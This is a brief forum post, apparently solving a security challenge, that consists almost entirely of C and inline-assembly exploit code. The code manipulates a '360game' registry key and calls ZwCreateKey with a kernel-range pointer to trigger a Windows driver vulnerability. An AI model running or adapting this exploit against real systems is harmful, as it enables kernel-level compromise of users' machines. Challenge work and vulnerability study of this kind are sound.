[Share] Solution to the third challenge
Posted:
2008-12-23 08:26
Exploiting the driver's vulnerability:
Core code:
HKEY hkey=(HKEY)"360game";
WCHAR xx[] = L"xxxx_fuck";
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");
RegOpenKey(HKEY_LOCAL_MACHINE , "SYSTEM\\" , &hkey);
OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;
InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);
RegDeleteKey(hkey,"360game");
__asm{
    push 0
    push 0
    push 0
    push 0
    lea eax,oba
    push eax
    push 0
    push 0
    call p
}